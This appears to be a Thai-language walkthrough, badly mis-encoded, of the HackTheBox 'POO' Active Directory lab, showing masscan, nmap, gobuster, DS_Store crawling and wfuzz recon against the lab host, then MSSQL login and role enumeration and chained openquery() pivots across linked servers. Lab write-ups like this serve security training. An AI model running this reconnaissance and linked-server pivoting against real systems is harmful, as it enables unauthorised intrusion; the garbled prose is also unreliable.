HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđƒāļ™āļšāļ—āļ„āļ§āļēāļĄāļ™āļĩāđ‰āđ€āļĢāļēāļˆāļ°āļ§āļīāđ€āļ„āļĢāļēāļ°āļŦāđŒāđ€āļ™āļ·āđ‰āļ­āđ€āļĢāļ·āđˆāļ­āļ‡āđ„āļĄāđˆāđƒāļŠāđˆāđāļ„āđˆāđ€āļ„āļĢāļ·āđˆāļ­āļ‡āļˆāļąāļāļĢ āđāļ•āđˆāđ€āļ›āđ‡āļ™āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ‚āļ™āļēāļ”āđ€āļĨāđ‡āļāļ—āļąāđ‰āļ‡āļŦāļĄāļ”āļˆāļēāļāđ„āļ‹āļ•āđŒ āđāļŪāđ‡āļ„āđ€āļ”āļ­āļ°āļšāđ‡āļ­āļāļ‹āđŒ.

āļ•āļēāļĄāļ—āļĩāđˆāļĢāļ°āļšāļļāđ„āļ§āđ‰āđƒāļ™āļ„āļģāļ­āļ˜āļīāļšāļēāļĒ POO āđ„āļ”āđ‰āļĢāļąāļšāļāļēāļĢāļ­āļ­āļāđāļšāļšāļĄāļēāđ€āļžāļ·āđˆāļ­āļ—āļ”āļŠāļ­āļšāļ—āļąāļāļĐāļ°āđƒāļ™āļ—āļļāļāļ‚āļąāđ‰āļ™āļ•āļ­āļ™āļ‚āļ­āļ‡āļāļēāļĢāđ‚āļˆāļĄāļ•āļĩāđƒāļ™āļŠāļ āļēāļžāđāļ§āļ”āļĨāđ‰āļ­āļĄ Active Directory āļ‚āļ™āļēāļ”āđ€āļĨāđ‡āļ āđ€āļ›āđ‰āļēāļŦāļĄāļēāļĒāļ„āļ·āļ­āļāļēāļĢāļ›āļĢāļ°āļ™āļĩāļ›āļĢāļ°āļ™āļ­āļĄāđ‚āļŪāļŠāļ•āđŒāļ—āļĩāđˆāļĄāļĩāļ­āļĒāļđāđˆ āđ€āļžāļīāđˆāļĄāļĢāļ°āļ”āļąāļšāļŠāļīāļ—āļ˜āļīāđŒ āđāļĨāļ°āđƒāļ™āļ—āļĩāđˆāļŠāļļāļ”āļāđ‡āļ›āļĢāļ°āļ™āļĩāļ›āļĢāļ°āļ™āļ­āļĄāļ—āļąāđ‰āļ‡āđ‚āļ”āđ€āļĄāļ™āļ”āđ‰āļ§āļĒāļāļēāļĢāļĢāļ§āļšāļĢāļ§āļĄ 5 āđāļŸāļĨāđ‡āļāđƒāļ™āļāļĢāļ°āļšāļ§āļ™āļāļēāļĢ

āļāļēāļĢāđ€āļŠāļ·āđˆāļ­āļĄāļ•āđˆāļ­āļāļąāļšāļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļœāđˆāļēāļ™ VPN āļ‚āļ­āđāļ™āļ°āļ™āļģāļ§āđˆāļēāļ­āļĒāđˆāļēāđ€āļŠāļ·āđˆāļ­āļĄāļ•āđˆāļ­āļˆāļēāļāļ„āļ­āļĄāļžāļīāļ§āđ€āļ•āļ­āļĢāđŒāļ—āļĩāđˆāđƒāļŠāđ‰āļ‡āļēāļ™āđ„āļ”āđ‰āļŦāļĢāļ·āļ­āļˆāļēāļāđ‚āļŪāļŠāļ•āđŒāļ—āļĩāđˆāļĄāļĩāļ‚āđ‰āļ­āļĄāļđāļĨāļŠāļģāļ„āļąāļāļŠāļģāļŦāļĢāļąāļšāļ„āļļāļ“ āđ€āļ™āļ·āđˆāļ­āļ‡āļˆāļēāļāļ„āļļāļ“āđ€āļ‚āđ‰āļēāļŠāļđāđˆāđ€āļ„āļĢāļ·āļ­āļ‚āđˆāļēāļĒāļŠāđˆāļ§āļ™āļ•āļąāļ§āļāļąāļšāļ„āļ™āļ—āļĩāđˆāļĢāļđāđ‰āļšāļēāļ‡āļ­āļĒāđˆāļēāļ‡āđ€āļāļĩāđˆāļĒāļ§āļāļąāļšāļ„āļ§āļēāļĄāļ›āļĨāļ­āļ”āļ āļąāļĒāļ‚āļ­āļ‡āļ‚āđ‰āļ­āļĄāļđāļĨ 🙂

āļ‚āđ‰āļ­āļĄāļđāļĨāļ­āļ‡āļ„āđŒāļāļĢ
āđ€āļžāļ·āđˆāļ­āđƒāļŦāđ‰āļ„āļļāļ“āļ„āđ‰āļ™āļŦāļēāļ‚āđ‰āļ­āļĄāļđāļĨāđ€āļāļĩāđˆāļĒāļ§āļāļąāļšāļšāļ—āļ„āļ§āļēāļĄ āļ‹āļ­āļŸāļ•āđŒāđāļ§āļĢāđŒ āđāļĨāļ°āļ‚āđ‰āļ­āļĄāļđāļĨāļ­āļ·āđˆāļ™ āđ† āđƒāļŦāļĄāđˆ āļ‰āļąāļ™āļˆāļķāļ‡āļŠāļĢāđ‰āļēāļ‡āļ‚āļķāđ‰āļ™ āļŠāđˆāļ­āļ‡āđƒāļ™āđ‚āļ—āļĢāđ€āļĨāļ‚ Ðļ āļāļĨāļļāđˆāļĄāđ€āļžāļ·āđˆāļ­āļŦāļēāļĢāļ·āļ­āđ€āļāļĩāđˆāļĒāļ§āļāļąāļšāļ›āļąāļāļŦāļēāđƒāļ” āđ† āđƒāļ™āļžāļ·āđ‰āļ™āļ—āļĩāđˆāļ‚āļ­āļ‡ IIKB āļ„āļģāļ‚āļ­āļŠāđˆāļ§āļ™āļ•āļąāļ§ āļ„āļģāļ–āļēāļĄ āļ‚āđ‰āļ­āđ€āļŠāļ™āļ­āđāļ™āļ° āđāļĨāļ°āļ‚āđ‰āļ­āđ€āļŠāļ™āļ­āđāļ™āļ°āļ‚āļ­āļ‡āļ„āļļāļ“ āļ‰āļąāļ™āļˆāļ°āļ”āļđāđāļĨāļ°āļ•āļ­āļšāļāļĨāļąāļšāļ—āļļāļāļ„āļ™.

āļ‚āđ‰āļ­āļĄāļđāļĨāļ—āļąāđ‰āļ‡āļŦāļĄāļ”āļˆāļąāļ”āļ—āļģāļ‚āļķāđ‰āļ™āđ€āļžāļ·āđˆāļ­āļāļēāļĢāļĻāļķāļāļĐāļēāđ€āļ—āđˆāļēāļ™āļąāđ‰āļ™ āļœāļđāđ‰āđ€āļ‚āļĩāļĒāļ™āđ€āļ­āļāļŠāļēāļĢāļ™āļĩāđ‰āđ„āļĄāđˆāļĢāļąāļšāļœāļīāļ”āļŠāļ­āļšāļ•āđˆāļ­āļ„āļ§āļēāļĄāđ€āļŠāļĩāļĒāļŦāļēāļĒāđƒāļ” āđ† āļ—āļĩāđˆāđ€āļāļīāļ”āļāļąāļšāļšāļļāļ„āļ„āļĨāđƒāļ”āļ­āļąāļ™āđ€āļ›āđ‡āļ™āļœāļĨāļĄāļēāļˆāļēāļāļāļēāļĢāđƒāļŠāđ‰āļ„āļ§āļēāļĄāļĢāļđāđ‰āđāļĨāļ°āļ§āļīāļ˜āļĩāļāļēāļĢāļ—āļĩāđˆāđ„āļ”āđ‰āļĢāļąāļšāļˆāļēāļāļāļēāļĢāļĻāļķāļāļĐāļēāđ€āļ­āļāļŠāļēāļĢāļ™āļĩāđ‰

āđāļ™āļ°āļ™āļģ

endgame āļ™āļĩāđ‰āļ›āļĢāļ°āļāļ­āļšāļ”āđ‰āļ§āļĒāļŠāļ­āļ‡āđ€āļ„āļĢāļ·āđˆāļ­āļ‡āđāļĨāļ°āļĄāļĩ 5 āļ˜āļ‡

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ„āļģāļ­āļ˜āļīāļšāļēāļĒāđāļĨāļ°āļ—āļĩāđˆāļ­āļĒāļđāđˆāļ‚āļ­āļ‡āđ‚āļŪāļŠāļ•āđŒāļ—āļĩāđˆāļĄāļĩāļ­āļĒāļđāđˆāļˆāļ°āđ„āļ”āđ‰āļĢāļąāļšāļ”āđ‰āļ§āļĒ

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļĄāļēāđ€āļĢāļīāđˆāļĄāļāļąāļ™āđ€āļĨāļĒ!

āļ˜āļ‡āļĢāļĩāļ„āļ­āļ™

āđ€āļ„āļĢāļ·āđˆāļ­āļ‡āļ™āļĩāđ‰āļĄāļĩāļ—āļĩāđˆāļ­āļĒāļđāđˆ IP 10.13.38.11 āļ‹āļķāđˆāļ‡āļ‰āļąāļ™āđ€āļžāļīāđˆāļĄāđƒāļ™ /etc/hosts
10.13.38.11 poo.htb

āļ‚āļąāđ‰āļ™āļ•āļ­āļ™āđāļĢāļāļ„āļ·āļ­āļāļēāļĢāļŠāđāļāļ™āļžāļ­āļĢāđŒāļ•āļ—āļĩāđˆāđ€āļ›āļīāļ”āļ­āļĒāļđāđˆ āđ€āļ™āļ·āđˆāļ­āļ‡āļˆāļēāļāļāļēāļĢāļŠāđāļāļ™āļžāļ­āļĢāđŒāļ•āļ—āļąāđ‰āļ‡āļŦāļĄāļ”āļ”āđ‰āļ§āļĒ nmap āđƒāļŠāđ‰āđ€āļ§āļĨāļēāļ™āļēāļ™ āļ‰āļąāļ™āļˆāļ°āļ—āļģāļāļēāļĢāļŠāđāļāļ™āļ”āđ‰āļ§āļĒ Masscan āļāđˆāļ­āļ™ āđ€āļĢāļēāļŠāđāļāļ™āļžāļ­āļĢāđŒāļ• TCP āđāļĨāļ° UDP āļ—āļąāđ‰āļ‡āļŦāļĄāļ”āļˆāļēāļāļ­āļīāļ™āđ€āļ—āļ­āļĢāđŒāđ€āļŸāļ‹ tun0 āļ—āļĩāđˆ 500pps

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ•āļ­āļ™āļ™āļĩāđ‰ āđ€āļžāļ·āđˆāļ­āļĢāļąāļšāļ‚āđ‰āļ­āļĄāļđāļĨāđ‚āļ”āļĒāļĨāļ°āđ€āļ­āļĩāļĒāļ”āđ€āļžāļīāđˆāļĄāđ€āļ•āļīāļĄāđ€āļāļĩāđˆāļĒāļ§āļāļąāļšāļšāļĢāļīāļāļēāļĢāļ—āļĩāđˆāļ—āļģāļ‡āļēāļ™āļšāļ™āļžāļ­āļĢāđŒāļ• āđ€āļĢāļēāļĄāļēāļŠāđāļāļ™āļ”āđ‰āļ§āļĒāļ•āļąāļ§āđ€āļĨāļ·āļ­āļ -A

nmap -A poo.htb -p80,1433

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ”āļąāļ‡āļ™āļąāđ‰āļ™āđ€āļĢāļēāļˆāļķāļ‡āļĄāļĩāļšāļĢāļīāļāļēāļĢ IIS āđāļĨāļ° MSSQL āđƒāļ™āļāļĢāļ“āļĩāļ™āļĩāđ‰ āđ€āļĢāļēāļˆāļ°āļ„āđ‰āļ™āļŦāļēāļŠāļ·āđˆāļ­ DNS āļ—āļĩāđˆāđāļ—āđ‰āļˆāļĢāļīāļ‡āļ‚āļ­āļ‡āđ‚āļ”āđ€āļĄāļ™āđāļĨāļ°āļ„āļ­āļĄāļžāļīāļ§āđ€āļ•āļ­āļĢāđŒ āļšāļ™āđ€āļ§āđ‡āļšāđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒ āđ€āļĢāļēāđ„āļ”āđ‰āļĢāļąāļšāļāļēāļĢāļ•āđ‰āļ­āļ™āļĢāļąāļšāļˆāļēāļāđ‚āļŪāļĄāđ€āļžāļˆ IIS

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļĄāļēāļ§āļ™āļ‹āđ‰āļģāđ„āļ”āđ€āļĢāđ‡āļāļ—āļ­āļĢāļĩāļāļąāļ™ āļ‰āļąāļ™āđƒāļŠāđ‰ gobuster āļŠāļģāļŦāļĢāļąāļšāļŠāļīāđˆāļ‡āļ™āļĩāđ‰ āđƒāļ™āļžāļēāļĢāļēāļĄāļīāđ€āļ•āļ­āļĢāđŒāđ€āļĢāļēāļĢāļ°āļšāļļāļˆāļģāļ™āļ§āļ™āļŠāļ•āļĢāļĩāļĄ 128 (-t), URL (-u), āļžāļˆāļ™āļēāļ™āļļāļāļĢāļĄ (-w) āđāļĨāļ°āļŠāđˆāļ§āļ™āļ‚āļĒāļēāļĒāļ—āļĩāđˆāđ€āļĢāļēāļŠāļ™āđƒāļˆ (-x)

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ”āļąāļ‡āļ™āļąāđ‰āļ™āđ€āļĢāļēāļˆāļķāļ‡āļĄāļĩāļāļēāļĢāļ•āļĢāļ§āļˆāļŠāļ­āļšāļŠāļīāļ—āļ˜āļīāđŒ HTTP āļŠāļģāļŦāļĢāļąāļšāđ„āļ”āđ€āļĢāđ‡āļāļ—āļ­āļĢāļĩ /admin āļĢāļ§āļĄāļ–āļķāļ‡āđ„āļŸāļĨāđŒāļžāļ·āđ‰āļ™āļ—āļĩāđˆāđ€āļāđ‡āļšāļ‚āđ‰āļ­āļĄāļđāļĨāļšāļĢāļīāļāļēāļĢāđ€āļ”āļŠāļāđŒāļ—āđ‡āļ­āļ› .DS_Store āļ—āļĩāđˆāļžāļĢāđ‰āļ­āļĄāđƒāļŠāđ‰āļ‡āļēāļ™ .DS_Store āļ„āļ·āļ­āđ„āļŸāļĨāđŒāļ—āļĩāđˆāđ€āļāđ‡āļšāļāļēāļĢāļ•āļąāđ‰āļ‡āļ„āđˆāļēāļ‚āļ­āļ‡āļœāļđāđ‰āđƒāļŠāđ‰āļŠāļģāļŦāļĢāļąāļšāđ‚āļŸāļĨāđ€āļ”āļ­āļĢāđŒ āđ€āļŠāđˆāļ™ āļĢāļēāļĒāļāļēāļĢāđ„āļŸāļĨāđŒ āļ•āļģāđāļŦāļ™āđˆāļ‡āđ„āļ­āļ„āļ­āļ™ āļ āļēāļžāļžāļ·āđ‰āļ™āļŦāļĨāļąāļ‡āļ—āļĩāđˆāđ€āļĨāļ·āļ­āļ āđ„āļŸāļĨāđŒāļ”āļąāļ‡āļāļĨāđˆāļēāļ§āļ­āļēāļˆāđ„āļ›āļ­āļĒāļđāđˆāđƒāļ™āđ„āļ”āđ€āļĢāđ‡āļāļ—āļ­āļĢāļĩāđ€āļ§āđ‡āļšāđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒāļ‚āļ­āļ‡āļ™āļąāļāļžāļąāļ’āļ™āļēāđ€āļ§āđ‡āļš āļ”āļąāļ‡āļ™āļąāđ‰āļ™āđ€āļĢāļēāļˆāļķāļ‡āđ„āļ”āđ‰āļĢāļąāļšāļ‚āđ‰āļ­āļĄāļđāļĨāđ€āļāļĩāđˆāļĒāļ§āļāļąāļšāđ€āļ™āļ·āđ‰āļ­āļŦāļēāļ‚āļ­āļ‡āđ„āļ”āđ€āļĢāđ‡āļāļ—āļ­āļĢāļĩ āļŠāļģāļŦāļĢāļąāļšāļŠāļīāđˆāļ‡āļ™āļĩāđ‰āļ„āļļāļ“āļŠāļēāļĄāļēāļĢāļ–āđƒāļŠāđ‰ āđ‚āļ›āļĢāđāļāļĢāļĄāļĢāļ§āļšāļĢāļ§āļĄāļ‚āđ‰āļ­āļĄāļđāļĨ DS_Store.

python3 dsstore_crawler.py -i http://poo.htb/

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđ€āļĢāļēāđ„āļ”āđ‰āļĢāļąāļšāđ€āļ™āļ·āđ‰āļ­āļŦāļēāļ‚āļ­āļ‡āđ„āļ”āđ€āļĢāđ‡āļāļ—āļ­āļĢāļĩ āļŠāļīāđˆāļ‡āļ—āļĩāđˆāļ™āđˆāļēāļŠāļ™āđƒāļˆāļ—āļĩāđˆāļŠāļļāļ”āļ„āļ·āļ­āđ„āļ”āđ€āļĢāđ‡āļāļ—āļ­āļĢāļĩ /dev āļ‹āļķāđˆāļ‡āđ€āļĢāļēāļŠāļēāļĄāļēāļĢāļ–āļ”āļđāļ‹āļ­āļĢāđŒāļŠāđāļĨāļ°āđ„āļŸāļĨāđŒ db āđƒāļ™āļŠāļ­āļ‡āļŠāļēāļ‚āļēāđ„āļ”āđ‰ āđāļ•āđˆāđ€āļĢāļēāļŠāļēāļĄāļēāļĢāļ–āđƒāļŠāđ‰āļ­āļąāļāļ‚āļĢāļ° 6 āļ•āļąāļ§āđāļĢāļāļ‚āļ­āļ‡āļŠāļ·āđˆāļ­āđ„āļŸāļĨāđŒāđāļĨāļ°āđ„āļ”āđ€āļĢāđ‡āļāļ—āļ­āļĢāļĩāđ„āļ”āđ‰ āļŦāļēāļāļšāļĢāļīāļāļēāļĢāļĄāļĩāļ„āļ§āļēāļĄāđ€āļŠāļĩāđˆāļĒāļ‡āļ•āđˆāļ­ IIS ShortName āļ„āļļāļ“āļŠāļēāļĄāļēāļĢāļ–āļ•āļĢāļ§āļˆāļŠāļ­āļšāļŠāđˆāļ­āļ‡āđ‚āļŦāļ§āđˆāļ™āļĩāđ‰āđ„āļ”āđ‰āđ‚āļ”āļĒāđƒāļŠāđ‰ āđ€āļ„āļĢāļ·āđˆāļ­āļ‡āļŠāđāļāļ™āļŠāļ·āđˆāļ­āļĒāđˆāļ­ IIS.

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđāļĨāļ°āđ€āļĢāļēāļžāļšāđ„āļŸāļĨāđŒāļ‚āđ‰āļ­āļ„āļ§āļēāļĄāļŦāļ™āļķāđˆāļ‡āđ„āļŸāļĨāđŒāļ—āļĩāđˆāļ‚āļķāđ‰āļ™āļ•āđ‰āļ™āļ”āđ‰āļ§āļĒ "poo_co" āđ‚āļ”āļĒāđ„āļĄāđˆāļĢāļđāđ‰āļ§āđˆāļēāļ•āđ‰āļ­āļ‡āļ—āļģāļ­āļĒāđˆāļēāļ‡āđ„āļĢāļ•āđˆāļ­āđ„āļ› āļ‰āļąāļ™āđ€āļžāļĩāļĒāļ‡āđ€āļĨāļ·āļ­āļāļˆāļēāļāļžāļˆāļ™āļēāļ™āļļāļāļĢāļĄāļ‚āļ­āļ‡āđ„āļ”āđ€āļĢāđ‡āļāļ—āļ­āļĢāļĩāļ‚āļ­āļ‡āļ„āļģāļ—āļąāđ‰āļ‡āļŦāļĄāļ”āļ—āļĩāđˆāļ‚āļķāđ‰āļ™āļ•āđ‰āļ™āļ”āđ‰āļ§āļĒ "co"

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

āđāļĨāļ°āļ§āļ™āļ‹āđ‰āļģāļ”āđ‰āļ§āļĒ wfuzz

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđāļĨāļ°āļ„āđ‰āļ™āļŦāļēāļ„āļģāļ—āļĩāđˆāđ€āļŦāļĄāļēāļ°āļŠāļĄ! āđ€āļĢāļēāļ”āļđāļ—āļĩāđˆāđ„āļŸāļĨāđŒāļ™āļĩāđ‰ āļšāļąāļ™āļ—āļķāļāļ‚āđ‰āļ­āļĄāļđāļĨāļ›āļĢāļ°āļˆāļģāļ•āļąāļ§ (āļ•āļąāļ”āļŠāļīāļ™āđ‚āļ”āļĒāļžāļēāļĢāļēāļĄāļīāđ€āļ•āļ­āļĢāđŒ DBNAME āļ‹āļķāđˆāļ‡āļĄāļēāļˆāļēāļ MSSQL)

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđ€āļĢāļēāļĄāļ­āļšāļ˜āļ‡āđāļĨāļ°āđ€āļĢāļēāļāđ‰āļēāļ§āļŦāļ™āđ‰āļē 20%

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļŦāļķ āļŸāļąāļ™āļ˜āļ‡

āđ€āļĢāļēāđ€āļŠāļ·āđˆāļ­āļĄāļ•āđˆāļ­āļāļąāļš MSSQL āļ‰āļąāļ™āđƒāļŠāđ‰ DBeaver

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđ€āļĢāļēāđ„āļĄāđˆāļžāļšāļŠāļīāđˆāļ‡āļ—āļĩāđˆāļ™āđˆāļēāļŠāļ™āđƒāļˆāđƒāļ™āļāļēāļ™āļ‚āđ‰āļ­āļĄāļđāļĨāļ™āļĩāđ‰ āļĨāļ­āļ‡āļŠāļĢāđ‰āļēāļ‡āļ•āļąāļ§āđāļāđ‰āđ„āļ‚ SQL āđāļĨāļ°āļ•āļĢāļ§āļˆāļŠāļ­āļšāļ§āđˆāļēāļœāļđāđ‰āđƒāļŠāđ‰āļ„āļ·āļ­āļ­āļ°āđ„āļĢ

SELECT name FROM master..syslogins;

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđ€āļĢāļēāļĄāļĩāļœāļđāđ‰āđƒāļŠāđ‰āļŠāļ­āļ‡āļ„āļ™ āļĄāļēāđ€āļŠāđ‡āļ„āļŠāļīāļ—āļ˜āļīāļžāļīāđ€āļĻāļĐāļāļąāļ™āđ€āļ–āļ­āļ°

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ”āļąāļ‡āļ™āļąāđ‰āļ™āļˆāļķāļ‡āđ„āļĄāđˆāļĄāļĩāļŠāļīāļ—āļ˜āļīāļžāļīāđ€āļĻāļĐāđƒāļ”āđ† āļĄāļēāļ”āļđāđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒāļ—āļĩāđˆāđ€āļŠāļ·āđˆāļ­āļĄāđ‚āļĒāļ‡āļāļąāļ™ āļ‰āļąāļ™āđ€āļ‚āļĩāļĒāļ™āđ€āļāļĩāđˆāļĒāļ§āļāļąāļšāđ€āļ—āļ„āļ™āļīāļ„āļ™āļĩāđ‰āļ­āļĒāđˆāļēāļ‡āļĨāļ°āđ€āļ­āļĩāļĒāļ” āļ—āļĩāđˆāļ™āļĩāđˆ.

SELECT * FROM master..sysservers;

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ”āļąāļ‡āļ™āļąāđ‰āļ™āđ€āļĢāļēāļˆāļķāļ‡āļžāļš SQL Server āļ­āļ·āđˆāļ™ āļ•āļĢāļ§āļˆāļŠāļ­āļšāļāļēāļĢāļ—āļģāļ‡āļēāļ™āļ‚āļ­āļ‡āļ„āļģāļŠāļąāđˆāļ‡āļšāļ™āđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒāļ™āļĩāđ‰āđ‚āļ”āļĒāđƒāļŠāđ‰ openquery()

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđāļĨāļ°āđ€āļĢāļēāļĒāļąāļ‡āļŠāļēāļĄāļēāļĢāļ–āļŠāļĢāđ‰āļēāļ‡ Query Tree āđ„āļ”āđ‰āļ­āļĩāļāļ”āđ‰āļ§āļĒ

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

